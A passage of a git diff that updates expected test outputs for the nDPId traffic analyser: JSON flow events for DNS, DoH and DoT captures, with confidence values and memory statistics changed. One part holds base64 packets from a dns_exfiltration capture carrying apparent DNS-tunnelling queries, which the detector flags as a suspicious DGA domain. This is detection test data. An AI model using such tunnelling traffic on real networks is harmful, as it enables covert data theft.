+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":1947,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":63,"global_ts_msec":1625744124461} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -69,9 +69,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879580 bytes -~~ total memory freed........: 5879580 bytes -~~ total allocations/frees...: 118171/118171 +~~ total memory allocated....: 6013214 bytes +~~ total memory freed........: 6013214 bytes +~~ total allocations/frees...: 120933/120933 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 901 chars diff --git a/test/results/dns_doh.pcap.out b/test/results/dns_doh.pcap.out index 89185788c..e86c58bec 100644 --- a/test/results/dns_doh.pcap.out +++ b/test/results/dns_doh.pcap.out 
@@ -4,9 +4,9 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":142,"packets-processed":142,"total-skipped-flows":0,"total-l4-payload-len":12658,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1571089204031} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 142/142 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875651 bytes -~~ total memory freed........: 5875651 bytes -~~ total allocations/frees...: 118259/118259 +~~ total memory allocated....: 6009285 bytes +~~ total memory freed........: 6009285 bytes +~~ total allocations/frees...: 121021/121021 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 958 chars diff --git a/test/results/dns_dot.pcap.out b/test/results/dns_dot.pcap.out index b62b33ef4..d8189bd66 100644 
--- a/test/results/dns_dot.pcap.out +++ b/test/results/dns_dot.pcap.out 
@@ -4,9 +4,9 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"} 
-01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": 
{"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} -01043{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": 
{"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} +01043{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":4269,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1572783666246} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876425 bytes -~~ total memory freed........: 5876425 bytes -~~ total allocations/frees...: 118155/118155 +~~ total memory allocated....: 6010059 bytes +~~ total memory freed........: 6010059 bytes +~~ total allocations/frees...: 120917/120917 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1635 chars diff --git a/test/results/dns_exfiltration.pcap.out b/test/results/dns_exfiltration.pcap.out index 3d503c98f..cecfa9b21 100644 --- a/test/results/dns_exfiltration.pcap.out +++ b/test/results/dns_exfiltration.pcap.out 
@@ -2,11 +2,11 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1580978146717} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1580978146717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1580978146717,"pkt":"qqru7hERjNzURr7ECABFAADJegRAAD8RAADAqNw4wKjLp9w1ADUAtSn4OR0BAAABAAAAAAAABmRuc2NhdDw1NDZiMDNmNTAwMDAwMDAwMDBhNjAyM2VkNGRmMTg0ZDZhYzVjMjYyOGI0NzcxNGZkZWU1ODRmZWQ3Mzk8NWEwM2I1YjFlMWFhOGY4ZmRiMWJiZThkNWUwNDk1MjE0MWY3ZDRmODJjN2UzYjA2ZGNjOGI4N2ZhZDdhGjE5ZTRkMDk4ZGM4YzYxOGY4ZDgxY2ZlYjAyAAAPAAE="} 
-00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1580978146888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1580978146888,"pkt":"jNzURr7Eqqru7hERCABFAAF0PC1AAD8R1RrAqMunwKjcOAA13DUBYD3xOR2BgAABAAEAAAAABmRuc2NhdDw1NDZiMDNmNTAwMDAwMDAwMDBhNjAyM2VkNGRmMTg0ZDZhYzVjMjYyOGI0NzcxNGZkZWU1ODRmZWQ3Mzk8NWEwM2I1YjFlMWFhOGY4ZmRiMWJiZThkNWUwNDk1MjE0MWY3ZDRmODJjN2UzYjA2ZGNjOGI4N2ZhZDdhGjE5ZTRkMDk4ZGM4YzYxOGY4ZDgxY2ZlYjAyAAAPAAHADAAPAAEAAAA8AJ8ACgZkbnNjYXQ\/MjAxZjAzZjUwMDAwMDAwMDAwNzEzYjkyNzFmMDExZGM3NjQyM2RhYjM5MmMzMmMxOGJmYzk2YjZkMjY5NWEyPzZhOTExYzk0NDcyZjU5NDA5YTVmNTI2MDEzZTc2MDE5MzY2YTA3NzkyOWUzNDgwZm